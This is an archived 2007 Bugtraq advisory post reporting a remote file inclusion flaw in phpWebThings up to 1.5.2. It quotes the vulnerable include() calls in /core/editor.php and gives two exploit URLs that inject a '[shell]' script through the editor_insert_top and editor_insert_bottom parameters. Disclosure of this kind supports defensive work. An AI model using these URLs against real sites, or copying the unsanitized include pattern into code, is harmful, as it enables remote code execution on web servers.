lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY143-W4A766A4293FBA5BE9D9F2BF260@phx.gbl>
Date: Thu, 7 Jun 2007 18:18:49 +0000
From: titanichacker titanichacker <titanichacker@....com>
To: <submit@...w0rm.com>
Cc: <bugtraq@...urityfocus.com>
Subject: phpWebThings ==>1.5.2 RFI


************
*script:phpWebThings ==>1.5.2 RFI
*
*dir url:http://sourceforge.net/project/showfiles.php?group_id=19103
*
*author:titanichacker
*
*c0ntact:the-modest-pirate@...mail.com
*
*H.P: hack-teach.com & mohandko.com & tryag.com
*
*bug in:
*
*(/core/editor.php)
*include($editor_insert_top);
*include($editor_insert_bottom);
*
*exploit:
*
*http://victim/path/core/editor.php?editor_insert_top=[shell]
*http://victim/path/core/editor.php?editor_insert_bottom=[shell]
*
*
*thanx
          cold-zero & mohandko & drbaka & arb-hawk & kof2002 & tryag & xp10 & egy-ghost & milw0rm
_________________________________________________________________
With Windows Live Hotmail, you can personalize your inbox with your favorite color.
www.windowslive-hotmail.com/learnmore/personalize.html?locale=en-us&ocid=TXT_TAGLM_HMWL_reten_addcolor_0607

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ